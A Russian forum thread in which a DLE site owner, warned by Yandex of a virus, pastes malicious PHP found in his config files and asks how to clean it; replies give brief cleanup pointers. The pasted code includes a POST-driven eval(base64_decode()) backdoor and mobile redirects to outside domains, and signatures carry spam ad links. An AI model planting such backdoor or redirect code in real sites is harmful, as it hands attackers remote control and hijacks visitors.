Вирус в DLE

С
На сайте с 03.02.2012
Offline
35
1000

Дня доброго....

Помогите, яндекс прислал письмо о вирусе на сайте, и действительно он по идее есть....

Лазил, лазил, потом открыл исходные код на главной странице, обнаружил вот такое инородное -

<script type="text/javascript" src=""></script>

облазил все, не могу найти где прописано это, чтоб удалить....

прошу помощи..

потом помимо всего.

В файле Конфиг и ДБКонфиг открыв увидел вот такое:

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://ya-analytics.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://googlecount.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://ya-analytics.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://ya-googl.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

?>

в разных местах, что с этим делать прошу подскажите, просто вырезать из файла и сохранить его?

+ какие лучше права поставить на файлы БД... а то стоят 666 как запрашивало при инстале....

Ссылка на сайт в Подписи, осторожно если будете входить, так как вирус там есть.....

---------- Добавлено 21.03.2013 в 20:51 ----------

Касаемо той ссылки, смотреть в индекс пхп, мэин тпл.... не увидел ее там....

---------- Добавлено 21.03.2013 в 21:27 ----------

Прошу подскажите....

Инвестиционный фонд. Платит (https://wain-group.com/?ref=Macota)
siv1987
На сайте с 02.04.2009
Offline
427
#1

Тема ужа давно спалена. Перечитываем несколько раз /ru/forum/764551

С
На сайте с 03.02.2012
Offline
35
#2

Спасибо, я думаю одной перечитки хватит)

izyalex
На сайте с 06.04.2009
Offline
60
#3

По поводу первого, нужно по всем файлам пройтись и поискать "trn.nm7.cc" , удалить .

ПО поводу второго и далее, читайте тут.

Сpanel хостинг (http://bit.ly/Vjwlfl) и ISPmanager хостинг (http://bit.ly/11NnOqJ) от 119р./мес VIP Премиум хостинг (http://bit.ly/VibYQ9) в Москве, 1000р./мес и не парюсь

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий